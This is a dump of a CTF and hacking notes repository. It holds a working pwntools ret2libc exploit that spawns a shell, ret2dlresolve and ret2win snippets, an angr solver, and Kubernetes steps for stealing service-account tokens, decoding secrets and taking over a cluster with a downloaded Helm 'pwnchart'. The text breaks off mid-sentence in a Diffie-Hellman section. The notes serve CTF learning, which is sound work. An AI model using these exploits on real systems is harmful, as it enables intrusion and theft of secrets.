-------------------------------------------------------------------------------- /.gitbook/assets/image (36).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (36).png -------------------------------------------------------------------------------- /.gitbook/assets/image (37).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (37).png -------------------------------------------------------------------------------- /.gitbook/assets/image (38) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (38) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (38).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (38).png -------------------------------------------------------------------------------- /.gitbook/assets/image (39).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (39).png -------------------------------------------------------------------------------- /.gitbook/assets/image (4) (1) (1) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (4) (1) (1) 
(1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (4) (1) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (4) (1) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (4) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (4) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (4).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (4).png -------------------------------------------------------------------------------- /.gitbook/assets/image (40).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (40).png -------------------------------------------------------------------------------- /.gitbook/assets/image (41).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (41).png -------------------------------------------------------------------------------- /.gitbook/assets/image (42).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (42).png 
-------------------------------------------------------------------------------- /.gitbook/assets/image (43).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (43).png -------------------------------------------------------------------------------- /.gitbook/assets/image (44).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (44).png -------------------------------------------------------------------------------- /.gitbook/assets/image (45).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (45).png -------------------------------------------------------------------------------- /.gitbook/assets/image (46).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (46).png -------------------------------------------------------------------------------- /.gitbook/assets/image (47).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (47).png -------------------------------------------------------------------------------- /.gitbook/assets/image (48).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (48).png 
-------------------------------------------------------------------------------- /.gitbook/assets/image (49).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (49).png -------------------------------------------------------------------------------- /.gitbook/assets/image (5) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (5) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (5) (2).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (5) (2).png -------------------------------------------------------------------------------- /.gitbook/assets/image (5).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (5).png -------------------------------------------------------------------------------- /.gitbook/assets/image (50).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (50).png -------------------------------------------------------------------------------- /.gitbook/assets/image (51).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (51).png 
-------------------------------------------------------------------------------- /.gitbook/assets/image (52).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (52).png -------------------------------------------------------------------------------- /.gitbook/assets/image (53).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (53).png -------------------------------------------------------------------------------- /.gitbook/assets/image (54).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (54).png -------------------------------------------------------------------------------- /.gitbook/assets/image (55).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (55).png -------------------------------------------------------------------------------- /.gitbook/assets/image (56).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (56).png -------------------------------------------------------------------------------- /.gitbook/assets/image (57).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (57).png 
-------------------------------------------------------------------------------- /.gitbook/assets/image (58).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (58).png -------------------------------------------------------------------------------- /.gitbook/assets/image (59).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (59).png -------------------------------------------------------------------------------- /.gitbook/assets/image (6) (1) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (6) (1) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (6) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (6) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (6) (2).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (6) (2).png -------------------------------------------------------------------------------- /.gitbook/assets/image (6) (3).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (6) 
(3).png -------------------------------------------------------------------------------- /.gitbook/assets/image (6) (4).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (6) (4).png -------------------------------------------------------------------------------- /.gitbook/assets/image (6).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (6).png -------------------------------------------------------------------------------- /.gitbook/assets/image (60).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (60).png -------------------------------------------------------------------------------- /.gitbook/assets/image (61).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (61).png -------------------------------------------------------------------------------- /.gitbook/assets/image (62).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (62).png -------------------------------------------------------------------------------- /.gitbook/assets/image (63).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (63).png 
-------------------------------------------------------------------------------- /.gitbook/assets/image (64).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (64).png -------------------------------------------------------------------------------- /.gitbook/assets/image (65).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (65).png -------------------------------------------------------------------------------- /.gitbook/assets/image (66).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (66).png -------------------------------------------------------------------------------- /.gitbook/assets/image (67).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (67).png -------------------------------------------------------------------------------- /.gitbook/assets/image (68).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (68).png -------------------------------------------------------------------------------- /.gitbook/assets/image (69).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (69).png 
-------------------------------------------------------------------------------- /.gitbook/assets/image (7) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (7) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (7) (2).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (7) (2).png -------------------------------------------------------------------------------- /.gitbook/assets/image (7) (3).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (7) (3).png -------------------------------------------------------------------------------- /.gitbook/assets/image (7).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (7).png -------------------------------------------------------------------------------- /.gitbook/assets/image (70).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (70).png -------------------------------------------------------------------------------- /.gitbook/assets/image (8) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (8) (1).png 
-------------------------------------------------------------------------------- /.gitbook/assets/image (8).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (8).png -------------------------------------------------------------------------------- /.gitbook/assets/image (9).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (9).png -------------------------------------------------------------------------------- /.gitbook/assets/image-removebg-preview (4).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image-removebg-preview (4).png -------------------------------------------------------------------------------- /.gitbook/assets/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image.png -------------------------------------------------------------------------------- /.gitbook/assets/mtp showcase.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/mtp showcase.gif -------------------------------------------------------------------------------- /.gitbook/assets/output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/output.png 
/.gitbook/assets/ret2libc.py:
--------------------------------------------------------------------------------
```python
from pwn import *

context.binary = elf = ELF("./pb")
libc = ELF("glibc/libc.so.6", checksec=False)
p = process(aslr=True)
# p = remote("10.10.10.10", 1337)

# Stage 1: leak the runtime address of puts() by calling puts(puts@GOT),
# then return to main() so the overflow can be triggered a second time
rop = ROP(elf)
rop.puts(elf.got["puts"])
rop.main()

OFFSET = 56  # Find using cyclic

payload = flat({
    OFFSET: [
        rop.chain()
    ]
})

p.sendlineafter(b"> ", payload)

p.recvuntil(b"thank you!\n")  # Some text printed before `ret` instruction

r = p.recv(6)  # Receive address of `puts()` as binary data
leak = u64(r.ljust(8, b"\x00"))
success("Leaked puts(): %#x", leak)

libc.address = leak - libc.symbols["puts"]
success("Libc base: %#x", libc.address)

# Stage 2: with libc rebased, build the system("/bin/sh") chain from libc gadgets;
# the extra `ret` keeps the stack 16-byte aligned before system()
rop = ROP(libc)
rop.call(rop.ret)
rop.system(next(libc.search(b"/bin/sh")))
rop.exit()

payload = flat({
    OFFSET: [
        rop.chain()
    ]
})

p.sendlineafter(b"> ", payload)

p.interactive()
```
--------------------------------------------------------------------------------
/.gitbook/assets/solve_with_angr.py:
--------------------------------------------------------------------------------
```python
# https://zeta-two.com/assets/other/nixucon18-slides.pdf
# https://research.kudelskisecurity.com/2016/08/08/angr-management-first-steps-and-limitations/
# https://flagbot.ch/lesson5.pdf <--- this one was by far the most useful.

import angr
import claripy
from pwn import ELF

# This is the library we are massaging.
e = ELF("./CrackThePassword")

target = e.sym.validatePassword

BASE = 0x0
ADDR_START = BASE + target
ADDR_GOOD = BASE + target + 0x490
# At this point, the checker function has decided to return 0
ADDR_BAD = BASE + target + 0x497

# Start a new project with the modded binary and some magic options.
proj = angr.Project(
    e.path, main_opts={"base_addr": BASE},
    load_options={
        "auto_load_libs": False,
        "use_system_libs": False,
    }
)

# We know that the flag has a certain size, so we can create a bitvector of precisely the right
# length. No worries if you don't, some bytes will just get resolved to 0x00 by angr.
flag_size = 32
flag = claripy.BVS("flag", 8*flag_size)

# Create a new state, and disable some of the unconstrained/uninitialized memory settings.
# The binary we're targeting isn't quite "normal", so angr gets a bit confused here.
#
# The cool thing here is that the call_state allows us to call into a specific piece of memory
# with an argument, like a pointer to the symbolic flag.
state = proj.factory.call_state(
    ADDR_START,
    flag,
    add_options = {
        angr.options.ZERO_FILL_UNCONSTRAINED_MEMORY,
        angr.options.ZERO_FILL_UNCONSTRAINED_REGISTERS
    })

# Adding constraints to the solver to obtain values that are in the printable range
for i in flag.chop(8):
    state.solver.add(i >= 0x20)
    state.solver.add(i <= 0x7f)

# Start a simulation
simgr = proj.factory.simulation_manager(state)
simgr.explore(find=ADDR_GOOD, avoid=ADDR_BAD)

if len(simgr.found) > 0:
    found = simgr.found[0]

    val_flag = found.solver.eval(flag, cast_to=bytes)
    val_flag = val_flag.strip(b"\0")

    print("flag: {}".format(val_flag.decode()))
else:
    print("No solution... :(")
```
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
---
description: >-
  A big collection of my notes for Capture The Flag (CTF) challenges or Hacking
  in general
cover: .gitbook/assets/hmBaYmHbB8.png
coverY: -121
layout:
  cover:
    visible: true
    size: full
  title:
    visible: true
  description:
    visible: true
  tableOfContents:
    visible: true
  outline:
    visible: true
  pagination:
    visible: false
---

# 🚩 Home - Practical CTF

:clipboard: Contains lots of copy-paste-ready commands/scripts to get things done quickly

:brain: I aim to explain as much as possible how and why the attack works

:man\_technologist: Inspired by [HackTricks](https://book.hacktricks.xyz/welcome/readme) but in my style, and including all the experiences I've had

{% hint style="warning" %}
This book won't ever be 'done' as I will keep updating it while I learn stuff.
You can \ 33 | ![](<.gitbook/assets/image (2) (1).png>)[**Watch**](https://github.com/JorianWoltjer/practical-ctf/commits/main.atom) the _RSS feed_ on my GitHub repository to see every change that happens! 34 | {% endhint %} 35 | 36 | ## Motivation 37 | 38 | I make a lot of writeups on my blog where I explain how I solved a specific fun challenge. This is often to explain to others, but also partly to look back on if I remember _that_ I have done something, but not exactly _how_. 39 | 40 | {% embed url="https://jorianwoltjer.com/blog/" %} 41 | My blog where I post CTF writeups, and general Hacking-related things 42 | {% endembed %} 43 | 44 | This book aims to be a big encyclopedia of everything I know about hacking. That way I can always look back at this book if I have done something before, without needing a full challenge with a writeup. Everything is written by myself unless specified otherwise. 45 | 46 | Get started by choosing a topic on the left sidebar, or search for anything in the top right! 47 | -------------------------------------------------------------------------------- /binary-exploitation/ret2win.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Jump to a predefined function in the binary, even with arguments 3 | --- 4 | 5 | # ret2win 6 | 7 | When you have found a buffer overflow, you can set the Instruction Pointer to any value by overwriting it. In some simple cases, there is a predefined function in the binary that may not even be used but can be jumped to. This is always an easy win, so check if this is the case in your binary. You can use `objdump -d ./binary` to view the disassembly of all known functions, or you can look at a decompiler of your choice to find these functions. 8 | 9 | To exploit it, you can use the simple PwnTools ROP functionality to find any required ROP gadgets automatically and resolve function names for you. 
10 | 11 | ```python 12 | elf = ELF("./binary") 13 | rop = ROP(elf) 14 | rop.win() 15 | 16 | payload = flat({ 17 | OFFSET: rop.chain() 18 | }) 19 | ``` 20 | 21 | The example above will call a function named `win()` in your binary, and then use the `flat()` function to add the required amount of padding before the return address (`rop.chain()`). If you have the correct offset, it will now jump to and run your function. 22 | 23 | {% hint style="warning" %} 24 | In some cases, the stack might be misaligned, causing segmentation faults even when doing it correctly like this. In such a case, you can simply realign the stack by inserting a single `ret` instruction before actually jumping to the desired function. 25 | 26 |
```python
rop = ROP(elf)
rop.call(rop.ret)
rop.win()
```
30 | {% endhint %} 31 | 32 | ## Adding arguments 33 | 34 | With some more PwnTools magic, adding arguments to a function call can also be really easy: 35 | 36 | ```python 37 | rop = ROP(elf) 38 | rop.win(42, 1337) 39 | ``` 40 | 41 | But sometimes you need a string, which is a little harder. String arguments are passed as **pointers** (addresses) to the string. This means the string itself is not actually stored on the stack we are overflowing, only the address is. We can only set the address, so we need to find some address where the string is stored. 42 | 43 | If you can leak addresses like the stack pointer, you can simply calculate the address of your own payload and point to it, since you completely control that value as it is your input. 44 | 45 | If you can only leak an address like libc, you can search in that binary to find the string you need. For example: 46 | 47 | ```python 48 | libc = ELF("./libc.so.6") 49 | bin_sh = next(libc.search(b"/bin/sh")) # 0x7fcdf0446698 50 | 51 | rop.system(bin_sh) # Call with string argument 52 | ``` 53 | 54 | This way you can still call functions with specific string arguments, to get a shell in this case. 55 | -------------------------------------------------------------------------------- /binary-exploitation/return-oriented-programming-rop/ret2dlresolve.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | A way to exploit buffer overflows using ROP when not many gadgets are 4 | available, and Full RELRO is disabled 5 | --- 6 | 7 | # ret2dlresolve 8 | 9 | Ret2dlresolve is a technique that can be used to trick the binary into resolving a specific function, such as `system()`, into the PLT (Procedure Linkage Table). By doing this, you can use the PLT function as if it was an original component of the binary. This bypasses ASLR and does not require any leaks of the libc address. 
10 | 11 | The attack is only possible when you can overwrite GOT entries, making it impossible on Full RELRO. On No RELRO and Partial RELRO, however, the attack is possible: 12 | 13 | ![](<../../.gitbook/assets/image (2) (1) (1) (1) (1).png>) 14 | 15 | For a more detailed explanation see: 16 | 17 | {% embed url="https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve" %} 18 | Detailed analysis and information about ret2dlresolve from ir0nstone's notes 19 | {% endembed %} 20 | 21 | ## PwnTools 22 | 23 | PwnTools contains a [`ret2dlresolve`](https://docs.pwntools.com/en/stable/rop/ret2dlresolve.html) function that can generate payloads for this attack automatically. 24 | 25 | ### `read()` 26 | 27 | ```python 28 | rop = ROP(elf) 29 | dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['sh']) 30 | rop.raw(rop.ret) # Align stack (64-bit) 31 | rop.read(0, dlresolve.data_addr) # Call read() to write the fake resolver data 32 | rop.ret2dlresolve(dlresolve) # Call the resolver using the written data 33 | 34 | p.sendline(flat({ 35 | OFFSET: rop.chain(), 36 | })) 37 | p.sendline(dlresolve.payload) # Run /bin/sh 38 | 39 | p.interactive() 40 | ``` 41 | 42 | ### `gets()` 43 | 44 | ```python 45 | rop = ROP(elf) 46 | dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['sh']) 47 | rop.raw(rop.ret) # Align stack (64-bit) 48 | rop.gets(dlresolve.data_addr) # Call gets() to write the fake resolver data 49 | rop.ret2dlresolve(dlresolve) # Call the resolver using the written data 50 | 51 | p.sendline(flat({ 52 | OFFSET: rop.chain(), 53 | })) 54 | p.sendline(dlresolve.payload) # Run /bin/sh 55 | 56 | p.interactive() 57 | ``` 58 | -------------------------------------------------------------------------------- /cloud/kubernetes.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Container Orchestration for managing big scalable infrastructure of 4 | containerized applications 5 | --- 6 | 7 | # Kubernetes 8 | 9 | {% embed 
url="https://kubernetes.io/docs/reference/glossary/?fundamental=true" %} 10 | Descriptions of common terminology in the Kubernetes world 11 | {% endembed %} 12 | 13 | The way of attacking a Kubernetes cluster is similar to attacking Windows Active Directory: 14 | 15 | 1. Find a **vulnerability** in an application (RCE, SSRF, SSH, etc.) 16 | 2. Perform **Lateral Movement** to access more pods and nodes with higher privileges 17 | 3. Reach the **Highest Privileges** to do anything an attacker wants 18 | 19 | ## Initial Access 20 | 21 | The `/var/run/secrets/kubernetes.io/serviceaccount/token` file (sometimes `/run` instead of `/var/run`) on a Kubernetes pod contains a Service Account Token in the form of a [JSON Web Token](https://jwt.io/). It can be decoded, and the payload tells you exactly who or what the account belongs to: 22 | 23 |
Figure: Decoded k8s Service Account Token (source)
24 | 25 | This token can be used for **Lateral Movement** in the rest of the cluster to interact with the API server, and because the pod sits in the internal network, a lot more servers are now reachable. A few useful endpoints are: 26 | 27 | * `/api/v1/namespaces/default/pods/`: List all pods in the `default` namespace 28 | * `/api/v1/namespaces/default/secrets/`: List all secrets in the `default` namespace 29 | 30 | These can be requested with the found Service Account Token (JWT) as a header: 31 | 32 | ```bash 33 | curl -v -H 'Authorization: Bearer <TOKEN>' https://<API_SERVER>/... 34 | ``` 35 | 36 | If the machine has `kubectl` installed (or you download a [static binary](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux)), it is also possible to simply use it instead of manual `curl` commands. Some similar and useful commands are: 37 | 38 |
```shell-session
# # List everything
$ kubectl get all --token $TOKEN --server $API_SERVER --insecure-skip-tls-verify
$ kubectl get pods     # List pods
$ kubectl get secrets  # List secrets

# # Execute an interactive shell with a pod
$ kubectl exec <POD_NAME> --stdin --tty  -- /bin/bash
# # Get and decode a secret
$ kubectl get secret <SECRET_NAME> -o jsonpath='{.data.*}' | base64 -d
```
48 | 49 | ## Helm V2 - Tiller 50 | 51 | At the time of writing, [Helm](https://helm.sh/) V3 is the newest version, but many clusters still use the outdated V2. This bears some serious security considerations as the Tiller component has full cluster administration RBAC privileges, which can be exploited if we have access to `helm`. 52 | 53 | Taken from [here](https://madhuakula.com/kubernetes-goat/docs/scenarios/scenario-9/helm-v2-tiller-to-pwn-kubernetes-cluster-takeover/welcome), you can test the TCP connection on port `44134` and verify the version: 54 | 55 |
```shell-session
$ nc -v tiller-deploy.kube-system 44134
Connection to tiller-deploy.kube-system 44134 port [tcp/*] succeeded!
$ helm version
Client: &version.Version{SemVer:"v2.0.0", GitCommit:"ff52399e51bb880526e9cd0ed8386f6433b74da1", GitTreeState:"clean"}
Server: &version.Version{SemVer:"v2.0.0", GitCommit:"b0c113dfb9f612a9add796549da66c0d294508a3", GitTreeState:"clean"}
```
61 | 62 | To start exploiting this, a ready-to-use template exists that requires some minimal changes: 63 | 64 | {% embed url="https://github.com/Ruil1n/helm-tiller-pwn" %} 65 | 66 | ```shell-session 67 | $ curl -o ./pwnchart.tgz https://github.com/Ruil1n/helm-tiller-pwn/raw/main/pwnchart-0.1.0.tgz 68 | $ tar xvf ./pwnchart.tgz 69 | ``` 70 | 71 | Inside the newly created `./pwnchart` folder, the two `clusterrole.yaml` and `clusterrolebinding.yaml` files in the `templates/` folder require the following change: 72 | 73 | {% code title="templates/*.yaml" %} 74 | ```diff 75 | - apiVersion: rbac.authorization.k8s.io/v1beta1 76 | + apiVersion: rbac.authorization.k8s.io/v1 77 | ``` 78 | {% endcode %} 79 | 80 | The `name:` key in the `values.yml` file also needs to be changed to the **name of the service account** which will gain all privileges. Make sure this is a service account you own: 81 | 82 | ```diff 83 | - name: default 84 | + name: compromised-user 85 | ``` 86 | 87 | Finally, after setting this up you can run the command to install it: 88 | 89 | ```bash 90 | helm --host tiller-deploy.kube-system:44134 install --name pwnchart ./pwnchart 91 | ``` 92 | 93 | After doing so, the `compromised-user` token will have every permission on the cluster and can access anything. Check `kubectl get all` for a list of everything. 
94 | -------------------------------------------------------------------------------- /cryptography/asymmetric-encryption/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Using Public and Private keys to securely transmit data in a way that only the 4 | recipients can decrypt it 5 | --- 6 | 7 | # Asymmetric Encryption 8 | 9 | -------------------------------------------------------------------------------- /cryptography/asymmetric-encryption/diffie-hellman.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | The Diffie-Hellman Key Exchange uses asymmetric encryption to set up a shared 4 | secret for symmetric encryption 5 | --- 6 | 7 | # Diffie-Hellman 8 | 9 | ## Description 10 | 11 | Symmetric encryption like AES requires a **Shared Secret** from both parties to be able to communicate securely across a **Public Channel** where messages can be intercepted or altered. Asymmetric encryption, on the other hand, only requires both parties to have their own keypair, but it is very slow to compute in comparison to symmetric encryption. \ 12 | The **Diffie-Hellman Key Exchange** solves this problem by utilizing an asymmetric scheme to create a shared secret that can then be used for symmetric encryption. 13 | 14 |
Figure: Diffie-Hellman Key Exchange: the Shared Secret is computed by Alice and Bob over a Public Channel
15 | 16 | Performing this algorithm is pretty simple. A _prime_ number `p` and _generator_ `g` are chosen (often some well-known numbers), and Alice and Bob both have their own _private key_. Using the public `g` and `p`, they both compute their _public key_, which is shared across the Public Channel. When each party receives the other's public key, they combine it with their own private key to compute the final secret. 17 | 18 | The order in multiplication does not matter, meaning Alice's $$g^{a*b}$$ will be the same as Bob's $$g^{b*a}$$.\ 19 | All without ever showing the private `a`, `b`, or the secret. 20 | 21 | In summary, Alice's private key + Bob's public key == Bob's private key + Alice's public key. 22 | 23 | ### Security 24 | 25 | The difficulty comes from knowing $$A = g^a \mod p$$, but being unable to compute `a` from it. It is known as the [Discrete Logarithm Problem](https://en.wikipedia.org/wiki/Discrete_logarithm) and if an efficient algorithm is ever found, it would break a lot of cryptography. 26 | 27 | $$ 28 | \begin{split} 29 | output &= base^{exponent} \mod p \\ 30 | { }\\ 31 | {exponent} &= \log_{base}(output) \mod p 32 | \end{split} 33 | $$ 34 | 35 | Read this [Wikipedia section](https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange#Security) about security for some more information, and a fun practical attack against the internet as we know it. 36 | 37 | ## Attacks 38 | 39 | There are many different attacks for the Diffie-Hellman key exchange, especially if you have some control over the numbers that computations happen on. I recommend looking up \ 40 | "diffie hellman ctf" in your favorite search engine to find some practical examples. 41 | 42 | An important piece here is the group order $$G$$ of the 